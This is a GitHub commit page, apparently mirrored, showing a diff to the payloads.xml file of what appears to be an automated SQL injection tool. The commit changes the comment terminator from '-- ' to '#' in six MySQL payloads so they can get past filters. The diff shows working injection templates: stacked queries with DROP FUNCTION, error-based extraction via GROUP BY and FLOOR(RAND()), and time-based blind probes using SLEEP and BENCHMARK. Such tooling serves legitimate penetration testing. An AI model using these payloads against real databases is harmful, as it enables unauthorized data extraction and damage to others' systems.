Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit df4e3be

Browse files
committed
using MySQL comments in explicit MySQL payloads where not comments stated in title (as we already use in MySQL UNION payloads; in lots of cases minus character is either filtered or "exploded" - seen in lots of WP vulnerabilites; also, it was a false claim by myself previously that # is no longer a valid MySQL comment syntax in never versions)
1 parent 885b432 commit df4e3be

1 file changed

Lines changed: 6 additions & 6 deletions

File tree

xml/payloads.xml

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1039,7 +1039,7 @@ Formats:
10391039
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
10401040
<request>
10411041
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
1042-
<comment>-- </comment>
1042+
<comment>#</comment>
10431043
</request>
10441044
<response>
10451045
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
@@ -1402,7 +1402,7 @@ Formats:
14021402
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
14031403
<request>
14041404
<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
1405-
<comment>-- </comment>
1405+
<comment>#</comment>
14061406
</request>
14071407
<response>
14081408
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1834,7 +1834,7 @@ Formats:
18341834
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
18351835
<request>
18361836
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
1837-
<comment>-- </comment>
1837+
<comment>#</comment>
18381838
</request>
18391839
<response>
18401840
<time>[SLEEPTIME]</time>
@@ -1855,7 +1855,7 @@ Formats:
18551855
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
18561856
<request>
18571857
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
1858-
<comment>-- </comment>
1858+
<comment>#</comment>
18591859
</request>
18601860
<response>
18611861
<time>[DELAYED]</time>
@@ -2106,7 +2106,7 @@ Formats:
21062106
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
21072107
<request>
21082108
<payload>AND SLEEP([SLEEPTIME])</payload>
2109-
<comment>-- </comment>
2109+
<comment>#</comment>
21102110
</request>
21112111
<response>
21122112
<time>[SLEEPTIME]</time>
@@ -2146,7 +2146,7 @@ Formats:
21462146
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
21472147
<request>
21482148
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
2149-
<comment>-- </comment>
2149+
<comment>#</comment>
21502150
</request>
21512151
<response>
21522152
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)